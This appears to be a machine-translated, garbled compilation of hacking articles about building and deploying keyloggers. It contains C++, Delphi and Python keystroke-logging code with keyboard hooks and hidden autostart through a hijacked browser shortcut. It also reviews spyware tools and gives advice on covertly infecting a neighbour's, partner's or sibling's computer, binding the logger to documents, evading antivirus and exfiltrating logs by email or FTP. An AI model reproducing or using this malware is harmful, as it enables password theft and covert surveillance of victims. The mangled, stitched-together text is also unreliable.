Pokrokove წერს keylogger გვ.



ინფორმაციული უსაფრთხოების ლაბორატორია. იაკ ცე ზრობლენო

კლავიატურის მალსახმობების დაწერის შესახებ
rozpovidalos უკვე არაერთხელ, მაგრამ ყველა stench
ერთი დიდი ნედოლიკის მოფიქრება - როგორც წესი,
მეტი უნდა ვიცოდე
ინფორმაცია და არ ჩაწეროთ ყველაფერი ჟურნალის ფაილში,
რას წერენ კლავიატურაზე კორისტუვაჩ - ძლივს ჩი შენ
ბევრი იფიქრო
ღილაკებზე დაჭერა CS-ში თამაშისას 😉

ჟღერს ყვირილი, რომ ჯაშუშს შეუძლია ნადავლი იყოს
მოდი ჩავდოთ და სულელურად არ ჩავწეროთ სხივში ყველაფერი
მოგცეთ 🙂 Navit დაასახელეთ ასეთი პროგრამა
ჯაშუშური იარაღი ენას არ აბრუნებს - ცე მაიჟე
ელექტრონული აგენტი 007 :-))) შლიახივი რათა
ასე რომ, პროგრამამ დაწერა ჟურნალში, რაზე უნდა დააჭიროს
ბევრი მასალა გვაქვს. უმარტივესი -
კონტროლი აქტიური Windows, tobto. იაკიში
ამ მომენტში დააჭირეთ ღილაკებს 🙂 Yak tee,
მგონი, იცით, შპიგუნები, როგორც წესი, ემატება
ხატული ფაილი, რომელიც DLL. ცე პოვიაზანო ზ ტიმი,
scho გადასვლისთვის
აუცილებელია შეიქმნას ახალი PROCESS და
ზრუჩნე ამისთვის - vikoristovuvati dll-ku.
იმისთვის, რომ გააქტიურდეს
თავად ლოგერი, თქვენ დაგჭირდებათ მისი გამოყენება
DLL-ის დაჭერის მომენტი და თუ ის აქტიურია
შეცვლა რაღაც სხვაზე - vivantage її z მეხსიერება.

მოდით შევხედოთ ჩემი Visual-ის DLL ფუნქციებს
C++. dlls-ის შესახებ გამოცანის გამოწვევა შესრულებულია
ფუნქცია hINSTAGE=LoadLibrary("name.dll"), hINSTAGE -
yak bi descriptor zavantazhenoї მეხსიერებაში DLL,
name.dll არის ბიბლიოთეკის სახელი. შჩობ її ვივანტაჟი,
FreeLibrary-ის მთავარი ფუნქცია (hINSTAGE);

ახლა მათ შესახებ, როგორ შეიძლება დაგვჭირდეს
პროგრამები. მაგალითად, ვიცით, რომ კორისტუვაჩი
წაიკითხეთ ფოსტა ვებგვერდის მეშვეობით www.mail.ru, შემდეგ შეგიძლიათ
ლურსმანი აგენტი ისე, რომ თქვენ გაიმარჯვებს
გასაღებების შემოტევა, თუ კორისტუვაჩი შევიდა ცეიში
ვებგვერდი. (მიჰყევით მეხსიერებას, რა წარსულში
დოდათახ სპიგუნი კლავიატურა ვზაგალი არა
შესაძლოა pratsyuvati, მაგალითად, მისამართის რიგში
Internet Explorer "a - ce to "გადაუდებელ მდგომარეობაში
პროგრამის დასრულება“ - კიდევ რას ხედავთ
Windows hot_v :))) რომელი მეთოდისთვის მთლიანად
pidide და წაიკითხეთ პაროლები აკრიფეთ
- როგორც კორისტუვაჩი იტანჯება პარანოიით და სკრუპებით
შეიყვანეთ შესვლა და გაიარეთ ხელით 🙂 ან სხვაგვარად
cіkavo dіznatisya scho vіn ჩაწერეთ Outlook-ში ან
ნოუთბუქში. კოდის ნაწილის ღერძი, რომელიც viconu
ჩვენ გვჭირდება ვიკონების სათაურების შეცვლა.

HINSTAGE hINSTAGE;

ხოლო (1)
{
//ციკლის დაწყება.

int sl,ll;
ll=1;
sl=2;
//შეცვლა ამისთვის
ლიჩილნიკია.
სქემა;
HWND hw;
//დემო მარტივია
shlyakhom - შემთხვევითი ხასიათის სტრიქონები:
წაართვით გადაცემის სათაური და ჩვენ დაგვჭირდება
გვერდიგვერდ.

ხოლო (ll != sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128); // იკითხება

char stt="_აქ ვწერთ საჭიროების სათაურს
us vіkna_№1";

sl=strlen(stt);
ll=0;
ხოლო (stt==st)
// თანაბარი
სტრიქონები პერსონაჟების მიხედვით
//ამ პოზიციებზე ჯობია, რა იქნება
გადაბრუნება, რომლის შესვლაც აუცილებელია
// ჩვენ მწკრივში ვართ, როგორც ნაწილი მომდევნო რიგში, შეგიძლიათ
zrobiti like //ფართო ფილტრი.
{
ll++;
}

თუ (ll==sl) ( //სტრიქონების მსგავსი
გაიარეთ პირველი რიგის ბოლომდე -
შეჩერება; // პროცესის შეწყვეტა
}
// და ჯერჯერობით - მოსწონს
აუცილებელია მთელი რიგი ვიკონების გარეგნობის შეცვლა.
char stt="_აქ ვწერთ საჭიროების სათაურს
us vіkna_№2";
sl=strlen(stt);
ll=0;
ხოლო (stt==st)
{
ll++;
}

თუ (ll==sl) (
შეჩერება; // პროცესის შეწყვეტა
}

თქვენ შეგიძლიათ შეცვალოთ შემდგომი ვერსია
შეინახეთ პარალელურად, თუ გასწორდით
ელემენტების ერთი ციკლი ზედიზედ, თუნდაც მხოლოდ ერთი
zbіglasya - შემდეგ გააქტიურებულია DLL-spygun.

hINSTAGE=LoadLibrary("key1.dll");

ახლა ჩვენ უნდა გადავწეროთ მთელი საათი,
chi ყოველთვის აქტიურია.

ხოლო (ll==sl) //დოკუმენტები
რიგები zbіgayutsya - ტრიალებს mіstsі
{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);// იკითხება
ერთდროულად უფრო აქტიური.
ll=0;
ხოლო (stt==st)
{
ll++;
}
}

დატოვეთ ციკლი და ისაუბრეთ მათზე, ვინც აქტიურია
უცებ შეიცვალა, რომ მისცეს ვივანტაჟუემო "სპიგუნი"
ბიბლიოთეკა და ციკლი იწყება კობ-ტობტოდან.
პროგრამა კვლავ შეამოწმებს, არის თუ არა vipade მარტო
თქვენ გჭირდებათ ვიკონები.

უფასო ბიბლიოთეკა (hINSTAGE);

თუმცა, მეთოდის ზემოთ აღწერილობები შეიძლება
nedolіki - აუცილებელია გადახედვა
vikon chi є საჭიროების მთელი სიიდან
აქტიურია ამ მომენტში. ტომ
შეგიძლიათ გამოიყენოთ სხვა ალგორითმი - არ გადააჭარბოთ
გადაცემის სათაური, მაგრამ გაოცებული, თითქოს მოცემული
EditBox "a" ტიპის ელემენტების ნახვა. როგორც წესი,
პაროლები იქ შენ თვითონ იწერება 🙂 ვისთვის იქნება
გაოცებული ვიქნას ელემენტი - და იაკშო
მათ შორის є Edit - ისევე როგორც DLL.

char p2, p3; //მასივი
სიმბოლოები ფანჯრების სათაურებისთვის.

იგივე ვიცი ციკლში, ვამოწმებ ყველა ვიკნას:

while (p3 !="რედაქტირება") //დოკუმენტები
არ ვიცოდი editbox - vikonuemo ციკლის შესახებ
{

hw=GetForegroundWindow();

HWND hwnd_child; // შეცვლა
ვიკნა ელემენტი

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child, p3, 128);
if (p3!="რედაქტირება")
// როგორც პირველი
ცნობილი ელემენტები ფანჯარაში - არა EditBox - იგივე
ხუმრობა შორს
{
ხოლო (hwnd_child != 0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child, p3, 128);
if (p3=="რედაქტირება")
{
შეჩერება;
}
}
}
}

ახლა vlasne შესახებ shpigunsku DLL.
დაწერე її უფრო ლამაზად Delphi-ში, ბო კიში
პასკალის მამაკაცურ ბალიშს არ შეუძლია
"სიპიშნოი" ჟღერს
prichipki მონაცემთა ტიპებს. შჩობ შექმნა
აირჩიეთ File-New-Direct Link Library - ი
DLL-ისთვის მომზადება მზად არის. და თავად ღერძი არის კოდი:

ბიბლიოთეკის გასაღები1;
იყენებს Windows-ს;

ვარ
KHook: HHOOK; //შეცვლა ამისთვის
"მაკარონი"

ფუნქცია KProc(კოდი: მთელი რიცხვი; wParam: Word; lParam: LongInt): LongInt; stdcall;
კონსტ
KState: მთელი რიცხვი = 1073741824; //კოდი
"გასაღები დაჭერილია"

ვარ
Simv: ShortString;
KL: ჩარის მასივი; //ამისთვის
კლავიატურის განლაგების ცვლილებები
FStruct: TOFSTRUCT;
F: TextFile;// შეცვლა
ჟურნალის ფაილი.

დაიწყოს

// შესვლა
შეხსენება
თუ (lParam და KState)<>0 მაშინ
დაიწყოს

გასასვლელი;
დასასრული;

AssignFile(F, "keylog.txt");

// ჩვენ გავაკეთებთ vodcity
ფაილი "keylog.txt":
თუ OpenFile(PChar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR მაშინ
დაიწყოს
ხელახლა ჩაწერა (F);// რომელი ფაილი არ არის
შექმნა - ჩვენ ვქმნით.
დასასრული
else დამატება (F);
//yakscho є - ჩაწერეთ
დასასრული.

Simv:=chr(0); // გაუქმებადი
შეცვალეთ სიმბოლო, რომელიც იკითხება კლავიატურაზე.

// კოდის გარჩევა
დაჭერილი გასაღები
საქმე wParam of
// ნომრები
48..57: Simv :=Chr(wParam);
96: სიმვ:="0";
97: სიმვ:="1";
...
104:simv:="8";
105: სიმვ:="9";
189.109: სიმვ:="-";
110: სიმვ:=".";
111: სიმვ:="/";
დასასრული;

GetKeyboardLayoutName(KL); //
განლაგების ხელახლა შემოწმება
yaksho KL = "00000409" მაშინ // იაკჩო
ლათინური:
დაიწყოს
საქმე wParam of
219: სიმვ:="[";
221: სიმვ:="]";
186: სიმვ:=";";
222: სიმვ:=""";
188: სიმვ:=",";
190: სიმვ:=".";
191: სიმვ:="/";
65..90: Simv :=Chr(wParam);
დასასრული;
დასასრული;
დასასრული;
yaksho KL = "00000419" მაშინ// იაკჩო
რუსული
დაიწყოს
საქმე wParam of
219: სიმვ:="X";
221: სიმვ:="ბ";
186: სიმვ: = „ფ“;
222: Simv:="E";
188: სიმვ:="ბ";
190: სიმვ: = „იუ“;
191: სიმვ:=".";
65: Simv:="F";
...
87: Simv:="C";
88: Simv:="H";
89: Simv:="H";
90: სიმვ: = „მე“;
დასასრული;

// ეს სიმბოლო არ არის ცარიელი (ასე.
ალფანუმერული ღილაკის დაჭერისას)
// შემდეგ ვწერთ იოგას ფაილს
თუ სიმვ<>"" მაშინ
ჩაწერა (F, Simv);
//ფაილის დახურვა
CloseFile(F);

// შეტყობინების გაგზავნა
სხვა პასტკები სისტემაში
შედეგი:=CallNextHookEx(KHook, კოდი, wParam, lParam);
დასასრული;

დაიწყოს
//Insert Paste
ცნობისთვის, მოდით ვისაუბროთ კლავიატურაზე.
KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

თქვენ ასევე შეგიძლიათ იკითხოთ ეს პროგრამა
ზასტოსუვანნიას - იაკსჩოს სფეროს ნაკვეთი
დასაშვებია მხოლოდ ერთხელ
პაროლი აკრიფედან - შეგიძლიათ იგივე დააყენოთ
perevirku on vіkna საჭიროებებს ჩვენთვის, და თუ ეს არ იქნება
გააქტიურდით - აიღეთ ბიბლიოთეკა
key1.dll, მიიღეთ პირველი საათი, ამისთვის
yak koristuvach vstigne შეავსეთ qi სიმბოლოები
კლავიატურაზე და შემდეგ ისარგებლეთ ბიბლიოთეკაში
დაასრულეთ პროგრამა. დაახლოებით ასეა 🙂

hINSTAGE=LoadLibrary("key1.dll");
ძილი (10000);
//ჩეკათი 10 წამი, თითო წ
საათი koristuvach აკრიფეთ პაროლი.
//საათი შეიძლება იყოს უფრო გაფუჭებული
კორისტუვაჩის გალვანიზაციის ეტაპის ტიპი
// ეს იოგას სიჩქარე კლავიატურაზე 🙂
უფასო ბიბლიოთეკა (hINSTAGE);

PS: მოყვანილია ყველა მოსაპირკეთებელი მასალა
დემოს ჩათვლით
წმინდა განმანათლებლური მიზნები, ავტორის პარამეტრი
დემონსტრირება თქვენს წინაშე
რობოტული პროგრამების ალგორითმი ტიპი "განახლება
კლავიატურა spigun" და ყველა
ჯილდო გამარჯვებისთვის
მასალა თქვენზე მოდის (უმეტესად
puller 🙂) განხორციელების კოდი აქვს
სხვა უზუსტობები
ალგორითმი - შეეცადეთ თავად იცოდეთ)).

PSS: ცხადია, keylogger შეიძლება არ იყოს
დაამარცხე შენი მთავარი ფუნქცია -
უმჯობესია ჩაწეროთ ღილაკების შემოტევის ჟურნალი, ალე თ
შეცვალეთ დაჭერილი ღილაკების მნიშვნელობა თქვენზე
ხალისი - ალე იაკ ცე რობიტი ი რისთვის
იქნებ უბრალოდ სიცოცხლეა საჭირო -
მოდის დრო 🙂

გამარჯობა, მე გეძახი QUAZAR-ს. დღეს მე გაჩვენებთ როგორ შევქმნათ მარტივი keylogger Python-ში. Zrozumіlo, tsey კლავიატურის ჯაშუშური იარაღი არ შეუძლია ირყევა ასეთ გიგანტებთან, მაგრამ ყველაფრის გათვალისწინების გარეშე შეგიძლიათ იცოდეთ თქვენი zastosuvannya.

რა არის keylogger?

მოხსენება მათ შესახებ, რომლებზეც არის ასეთი keylogger და keylogger-ების ნახვის შესახებ, შეგიძლიათ წაიკითხოთ სტატიაში "". ამ თემაზე დამატებითი მასალების საპოვნელად, მოძებნეთ ძიება საიტზე, რომელიც მდებარეობს ზედა მარჯვენა კუთხეში. უბრალოდ შეიყვანეთ სიტყვა keylogger ან keyboard pusher.

მარტივი Keylogger Python-ში

Keylogger-ის შესაქმნელად, ჩვენ გვჭირდება:

• ოპერაციული სისტემა: Windows ან MacOs
• ინსტალაციები მთელ Python მანქანაზე, ასევე სპეციალურ ბიბლიოთეკებზე.

ეს მასალა ინფორმაციული ხასიათისაა. სტატისტიკაში ვიკლადენა ინფორმაცია მოცემულია ექსკლუზიურად ცოდნაზე დაფუძნებული მეთოდით. არც საიტის www.site-ის რედაქცია და არც პუბლიკაციის ავტორი არ აგებენ პასუხს რაიმე შეცდომის გამო, სტატიის ხელმძღვანელი არის სტატიის ავტორი.

მარტივი keylogger-ის შექმნა Python-ში

დასაწყებად, თქვენ უნდა დააინსტალიროთ Python.

Python-ის დაყენების შემდეგ, თქვენ უნდა დააინსტალიროთ "pyHook" და "pywin32" მოდულები. ამ საიტზე ნახავთ 32-ბიტიან და 64-ბიტიან ვერსიებს Windows-ისთვის და სხვა ოპერაციული სისტემებისთვის. განაახლეთ PYhook და pyWin32 თქვენს მიერ დაინსტალირებული Python-ისა და Windows-ის ვერსიამდე (32 ბიტიანი ან 64 ბიტიანი).

როდესაც გსურთ მისი ინსტალაცია, გახსენით IDLE (Python GUI) მენიუ Start მენიუდან.

გადადით მენიუში "ფაილი" და დააჭირეთ პუნქტს "ახალი ფაილი". შემდეგ ჩასვით keylogger კოდი:

#სახელი: QUAZAR
#ვებგვერდი: www.website
იმპორტი pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.ascii)
logging.log(10,chr(event.ascii))
დაბრუნება True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown=OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

დაზოგეთ თანხა ფაილის Keylogger.pyw დასახელებით. უბრალოდ არ შეინახოთ ფაილი C root დირექტორიადან: ამ ფაილის კოპირებისთვის საჭიროა ადმინისტრატორის უფლებები. შექმენით ახალი საქაღალდე C დისკზე: წინააღმდეგ შემთხვევაში, სხვა ადგილას, არ გჭირდებათ ადმინისტრატორის უფლებები ფაილების კოპირებისთვის და იქ Keylogger.pyw-ის შესანახად.

როგორც გამომავალი ფაილი სახელწოდებით “file_log =“ C: keyloggerlog.txt ” შეგიძლიათ აირჩიოთ ადგილი, თუ უკეთესია, თუ მყარ დისკზე მიმაგრებულია. რომელი აპლიკაციიდან შევინახავ zvіtu ფაილს დისკზე root დირექტორიაში C:. აჯე ჩემთვის არაფერია დასაჭერი.

Keylogger-ის ავტომატური გაშვება Python-ში

Keylogger მზად არის. ახლა თქვენ უნდა იმუშაოთ ისე, რომ keylogger ავტომატურად ამოქმედდეს Windows პარამეტრებიდან. თქვენ შეგიძლიათ განახორციელოთ იგი სხვაგვარად. მოდით ვცადოთ zrobiti bat-ფაილის დასახმარებლად, keylogger-ის გაშვების დაკავშირება ნებისმიერ პროგრამასთან, ან დარეგისტრირებით ავტომატურ ჩანაწერში.

მე ვაპირებ bat ფაილის შექმნას. დააკოპირეთ და ჩასვით შემდეგი კოდი notepad-ში:

::სახელი: QUAZAR
:: ვებგვერდი: www.website
@echo გამორთულია
დაწყება "" "C:keyloggerkeylogger.pyw"
დაწყება "" "C:Program FilesOperalauncher.exe"

პირველ რიგში, თქვენ უნდა შეიყვანოთ გზა keylogger.pyw ფაილისკენ (ჩემს შემთხვევაში "C: keylogger.pyw"). მეორე რიგში, თქვენ ხართ პასუხისმგებელი პროგრამისკენ მიმავალ გზაზე შესვლაზე, ამიტომ დარეკეთ vikoristova koristuvach (ჩემი აზრით - Opera ბრაუზერი).

რედაქტირების შემდეგ შეინახეთ ფაილი .bat გაფართოებაში (ჩემს login logger.bat-ში) კომპიუტერის რომელიმე მიმაგრებულ ადგილას (ჩემს ლოგინში "C:keylogger.bat"-ში).

ახლა მოდით გადავიდეთ მუშაობის სტილზე და ავირჩიოთ მალსახმობი ხშირად გამოყენებული პროგრამისთვის (ჩემი ბრაუზერი არის Opera). ჩვენ ვაწკაპუნეთ მაუსის მარჯვენა ღილაკით დათვზე და დააჭირეთ კონტექსტურ მენიუს და გადადით მალსახმობის ავტორიტეტზე. ობიექტის ველში შეიყვანეთ გზა keylogger bat ფაილის C:keyloggerlogger.bat.

ცვლილების განხორციელების შემდეგ, მალსახმობის ხატულაც შეიცვლება. ალისა ადვილად დააბრალო ძალაუფლების მონაწილეები (გაოცება ეკრანზე).

ჩვენ შორის ვის არ უნდა ერთხელ მაინც ჩათვალოს თავი მაგარ ჰაკერად და თავად ზლამატის კონდახით? :) თუ გინდა იცოდე და არა, მაშინ ამის შესახებ, თუ კარგი იქნება პოსტიდან/სოციალური პაროლის აღება. merezhi მეგობარი, რაზმი / პირი, susіda in kіmnati ფიქრი მინდა ერთხელ ტყავი. :) რომ th უნდა გაასწორონ ის, zreshtoyu! ბევრი თავდასხმა (მავნე თავდასხმები) გულისხმობს მსხვერპლის კომპიუტერის ე.წ. keylogger-ებით (spyware) ინფიცირებას.

მოგვიანებით, დღევანდელ სტატიაში ვისაუბრებთ მათზე, ვინც არიან bezkoshtovnі პროგრამები Windows-ზე დაფუძნებულ კომპიუტერებზე სწავლისთვის, de mozhna zavantazhit їх ახალი ვერსიები, როგორიცაა მსხვერპლის კომპიუტერის დაინფიცირება მათთან და რატომ არის მათი ვარიანტის თავისებურება.

ალე, ზურგი უკან, ცოტა შეშუპებაა.

რისთვის გჭირდებათ keyloggers?

რაც შეეხება ასეთებს, ვფიქრობ, თქვენ თვითონ გამოიცანით. როგორც წესი, სუნი წააგავს პროგრამას, რომელიც მიმაგრებულია (თუ არ გინდა ამის გაკეთება) დაინსტალირდება მსხვერპლის კომპიუტერზე, რის შემდეგაც ის აფიქსირებს აბსოლუტურად ყველაფერს ამ კვანძის კლავიატურაზე. თავად ამ დანაშაულთან ერთად, თქვენივე ზეწოლის მიხედვით, ჟღერს დაფიქსირებული: შეტევის თარიღი-საათი (dії) ეს პროგრამა, ამ შემთხვევაში თქვენ მიიღებთ vikonanі (ბრაუზერი, საიტის მისამართის ჩათვლით (hooray, vіrazu bachimo, vіd chogo პაროლები!); ადგილობრივი დამატებები; სისტემური სერვისები (მათ შორის Windows შესვლის პაროლები და ა.შ.).

თქვენ ნათლად ხედავთ ერთ-ერთ პრობლემას: ორიოდე წუთი ავიღე წვდომა ჩემი სუიდკას კომპიუტერთან და მინდა ავიღო პაროლი VK-დან! სასწაული პროგრამის დაინსტალირებით და კომპიუტერის ჩართვით. როგორ ვნახო პაროლები? იცით როგორ აიღოთ მისგან კომპიუტერი? Є მიღებული სიახლე: როგორც წესი, nі. ქეილოგერების უმეტესობა ახლა უფრო სავარაუდოა, რომ შეინახოს ლოკალურად დაგროვილი ბაზის მთლიანი ნაწილი და კვლავ დალუქოს იგი უფრო შორს. ჟურნალების მართვის ვარიანტები არსებითად ანონიმურია:

• ფიქსირებული ელექტრონული ფოსტა (შესაძლოა kilka) - საუკეთესო ვარიანტი;
• FTP სერვერი (რომელსაც აქვს VIN є);
• SMB სერვერი
• ფლეშ დრაივი ფიქსირდება (ჩადეთ იგი მსხვერპლის კომპიუტერის USB პორტში და ყველა ჟურნალი იქ ავტომატურად კოპირდება უხილავ რეჟიმში!).

ყველაფერი აუცილებელია? ვფიქრობ, აზრი აშკარაა. პაროლების ბანალური ქურდობის დანაშაული, მტკნარი ქეილოგერები და რიგი მიმღები გამოსვლები:

• შესვლა ჩამონათვალი ამოცანები სოციალური. მერეჟახ ჩი მესინჯერები (მაგალითად, სკაიპი).
• ეკრანის გადაღება.
• Pereyad / გადაიღეთ მონაცემები ვებკამერიდან (რაც შეიძლება უფრო რთული იყოს).

როგორ გავტეხოთ keyloggery?

და საკვები არ არის ადვილი. აუცილებელია გვესმოდეს, რომ საკმარისი არ არის მხოლოდ კარგი ფუნქციონალური keylogger-ის ცოდნა.

ოტჟე, რა არის საჭირო წარმატებული რობოტული ჯაშუშური პროგრამისთვის:

• ადმინისტრატორის წვდომა დისტანციურ კომპიუტერზე.
  უფრო მეტიც, ეს არ არის obov'yazkovo ძალიან ფიზიკური წვდომა. შეგიძლიათ შეხვიდეთ RDP (დისტანციური დესკტოპ სერვისის) მეშვეობით; გუნდის დამთვალიერებელი; AmmyAdmin და ა.შ.
  როგორც წესი, ამ თვალსაზრისით, ყველაზე დაკეცილი ადგილები იკვრება. თუმცა, ახლახან დავწერე სტატია იმის შესახებ, თუ როგორ უნდა ავიღოთ ადმინისტრატორის უფლებები Windows-ში.
• ანონიმური ელფოსტა/ftp (ამისთვის თანხას არ გადაგახდით).
  ცხადია, რადგან თქვენ კითხულობთ სუსიდოვის შურას, შეგიძლიათ თამამად გამოტოვოთ ეს პუნქტი. ისევე, როგორც თქვენ გაქვთ vipadku, ისევე როგორც თქვენ გაქვთ ხელთ მსხვერპლის კომპიუტერი (ანუ, გაიგეთ ძმის/დის პაროლები).
• Vidsutnіst მუშაობს ანტივირუსები / შიდა სისტემები Windows-ის დასაცავად.
  მეტი საჯარო კლავიატურა (იხ. ქვემოთ) და უფრო მნიშვნელოვანი ანტივირუსული პროგრამული უზრუნველყოფა (უნდა შევიდეს ვირუსის ლოგერები OS-ის ბირთვში თუ სისტემის დრაივერში, და ანტივირუსები ვეღარ ამჩნევენ მათ, ვერ ანადგურებენ მათ. , მათ არ შეუძლიათ). ზემოაღნიშნულის ძალით ანტივირუსული პროგრამული უზრუნველყოფა, ისევე როგორც იგივე, დაუნდობლად განადგურდება. კარგი, ანტივირუსები, უსაფრთხო არ არის ჩვენი ჯაშუშური პროგრამები გახდეს იგივე სისტემა, როგორიც Windows Defender (ეს უფრო ადრე გამოჩნდა Windows 7-ში და მის ფარგლებს გარეთ). სუნი ეჭვობს მუშის აქტიურობას კომპიუტერზე. თქვენ შეგიძლიათ მარტივად გაიგოთ მათ შესახებ, ვისაც სურს იცოდეს მათ შესახებ Google-ში.

Axis, შესაძლოა, და ყველა საჭირო საკმარისი ყურადღება მიაქციეთ თქვენს წარმატებას სხვა ადამიანების პაროლების / ბროშურების / ფოტოების მოპარვის ტერიტორიაზე, თუ რისი ხელყოფის კიდევ ერთი ცდუნება შეგიძლიათ.

როგორ შეგიძლიათ ჩამოტვირთოთ spyware და de їx?

მოგვიანებით, მთავარ keylogger-ებზე გადახედვის შემდეგ, მე მქონდა შანსი, რომ გავიმარჯვო ჩემს ყოველდღიურ პრაქტიკაში მათი უახლესი ვერსიების უფასო ჩამოტვირთვების დახმარებით (ასე რომ, ყველა ვერსია დარჩა ახლა (მათთვის, ვინც ნამდვილად იცის სახეები) და უკვე ტესტერები და ვიკიერები).

0. ვირთხა!

რეიტინგი (10-დან):

• დანართი: 10
• ეფექტურობა / გამოყენებადობა: 9
• ფუნქციონალობა: 8

ცე მხოლოდ ბომბია და არა ქეილოგერი! სამუშაო სადგურზე დაჯექი 15-20 კბ. რატომ მაინტერესებს: ასამბლერში წერის უმრავლესობის გამო (ვეტერანი პროგრამისტები ტიროდნენ) და დიდის დაწერის გამო ჰაკერების ენთუზიასტების მიერ;

გარდა ამისა, პაკეტში შედის FileConnector - მინი პროგრამა, რომელიც საშუალებას გაძლევთ დააწებოთ keylogger ნებისმიერი პროგრამით. შედეგად, თქვენ მიიღებთ ახალ exe-ფაილს, პრაქტიკულად იგივე ზომის, და ის მუშაობს ისევე, როგორც ის პროგრამა, რომლითაც თქვენ დააწებეთ! პირველი გაშვების შემდეგ, თქვენი keylogger ავტომატურად დაყენდება უხილავ რეჟიმზე იმ პარამეტრების მიღმა, რომლებიც თქვენ დააყენეთ ჟურნალების აღსასრულებლად. მოსახერხებელია, არა?

შესანიშნავი შესაძლებლობა სოციალური ინჟინერიისთვის (მიიტანეთ მეგობარს ფაილ-თამაში/პრეზენტაცია ფლეშ დრაივზე, შეგიძლიათ უბრალოდ აკრიფოთ Word დოკუმენტი (როგორ შექმნათ exe-ik, რომელიც გამოუშვებს კონკრეტულ word/excel ფაილს თქვენს ერთ-ერთ შემდეგ სტატიაში ), გაშვება, ყველაფერი კარგი და ლამაზია, მაგრამ მეგობარი უხილავად უკვე ინფიცირებულია!). წინააღმდეგ შემთხვევაში, უბრალოდ ატვირთეთ ეს ფაილი მეგობარს ფოსტით (სჯობს გაგზავნოთ ჩამოსატვირთად, რათა ფოსტის სერვერებმა შეძლონ exe-ფაილების ჩამოტვირთვა და მართვა). ცხადია, ინსტალაციის დროს არსებობს ანტივირუსების რისკი, მაგრამ მაინც შეიძლება იყოს საჭირო (მაშინ ეს არ იქნება ინსტალაციის შემდეგ).

სხვათა შორის, სხვა მოწყობილობების დასახმარებლად, თქვენ შეგიძლიათ დააწებოთ მიმაგრებული ინსტალაციის ნებისმიერი სადისტრიბუციო ნაკრები (როგორიცაა The Rat! და Elite keylogger-ში) არა მხოლოდ exe ფაილებით (როგორც რამდენიმე ტროხის შემთხვევაში. დაჭყლეტილი კორისტუვაჩების, ერთი და იგივე, ისინი იძახიან ეჭვებს), ალე і შესანიშნავი სიტყვა / Excel და pdf ფაილებით! უკვე უბრალო pdf-ku-ზე, ვერაფერს მოიფიქრებთ, მაგრამ ის იქ არ არის! :) როგორ უნდა შეგეშინდეთ ეს მთელი სტატიის თემაა. განსაკუთრებით zavzyatі შეგიძლიათ მომწეროთ კვება დაბრუნების ლინკის სახით. ;)

ზაგალომი, ვირთხა! თქვენ შეგიძლიათ აღწეროთ იგი დიდხანს და ბევრს. კუდი ჯობია, ღერძი დამტვრეულია. არის მოთხოვნა ჩამოტვირთვის შესახებ.

1. Elite keylogger

რეიტინგი (10-დან):

• დანართი: 10
• ეფექტურობა / გამოყენებადობა: 9
• ფუნქციონალობა: 8

Mabut, ერთ-ერთი საუკეთესო ოდესმე შექმნილი keylogger. 20-მდე შესაძლებლობა, სტანდარტული ნაკრების მიღმა (ყველა დანამატის/ვიკონის/საიტის გადახურვა), მათ შორის მესინჯერების გადაჭარბება, სურათები ვებკამერიდან და ასევე - ეს კიდევ უფრო მნიშვნელოვანია! - შეცვალეთ WinLogon სერვისის პაროლები. სხვა სიტყვებით რომ ვთქვათ, თქვენ შეგიძლიათ შეცვალოთ პაროლები Windows-ში შესასვლელად (დომენის სახელების ჩათვლით!). შესაძლებელი გახდა რობოტების გაშვება სისტემის დრაივერის დონეზე და გაშვება OS-ის წინსვლის ეტაპზე. განსაკუთრებულობისთვის, ეს პროგრამა სრულიად უხილავია კასპერსკის და სხვა ანტი-სკრამბლერის პროგრამული უზრუნველყოფისთვის. ვიცი, მე არ შემიქმნია ტაქსიზე აგებული მორგებული keylogger.

ისე, პროტე არ არის ვარტო ჩუმად მასზე უკვე ძლიერად. თავად ინსტალერი ანტივირუსების მიერ კიდევ უფრო ადვილად აღიარებულია და მისი ინსტალაციისთვის გჭირდებათ ადმინისტრაციული უფლებები და ყველა ანტივირუსული სერვისისა და სერვისის ჩართვა. ინსტალაციის შემდეგ, ყველაფერი იდეალური იქნება ნებისმიერი შემთხვევისთვის.

გარდა ამისა, აღწერილია სპეციალური ფუნქცია (რობოტი, რომელიც დაფუძნებულია OS-ის ბირთვზე) OS-ის ვერსიის მხარდაჭერისთვის, რომელ keylogger-ზე იმუშავებს. ვერსია 5-5.3 (ქვემოთ გადასატანად) მხარს უჭერს ყველაფერს Windows 7-მდე და მათ შორის. Win 8/10, ისევე როგორც სერვერის ოჯახის ფანჯრები (2003/2008/2012) აღარ არის მხარდაჭერილი. Є ვერსია 6, რომელიც მუშაობს სასწაულებრივად, ჩათვლით. win 8-ზე და 10-ზე გატეხილი ვერსიის ცოდნა ამჟამად შეუძლებელია. მაბუთ, მომავალი გამოჩნდება. ამასობაში, შეგიძლიათ ჩამოტვირთოთ Elite keylogger 5.3 მეტი.

არ არსებობს შემოღობვის რეჟიმი, რომ vikoristannya რობოტებისთვის (მათი spіvrobіtnikіv კომპიუტერებთან სწავლისთვის), მაგრამ osіb-ის მთელი ჯგუფი არა pіdіyde.

მნიშვნელოვანი პუნქტია დაინსტალირებული სადისტრიბუციო ნაკრების შექმნის შესაძლებლობა პერსონალიზებით (მაგალითად, მოცემული მისამართიდან, ფოსტიდან, სადაც უნდა დაამატოთ ძალა ჟურნალებში). წასვლისას ამოიღებთ სადისტრიბუციო კომპლექტს, რომელიც გაშვებისას ვერ ხედავს მომავალ მიღწევებს ან ვიკონებს და ინსტალაციის შემდეგ შეგიძლიათ თავად ააწყოთ იგი (რაც ნიშნავს, რომ ვარიანტი განსხვავებულია).

მე-5 ვერსიის ეკრანის ასლი (იმისათვის, რომ ყველაფერი ლამაზი და მოსახერხებელია სრიალებზე):

2. All-in-one keylogger.

რეიტინგი (10-დან):

• დანართი: 3
• ეფექტურობა / გამოყენებადობა: 9
• ფუნქციონალობა: 8

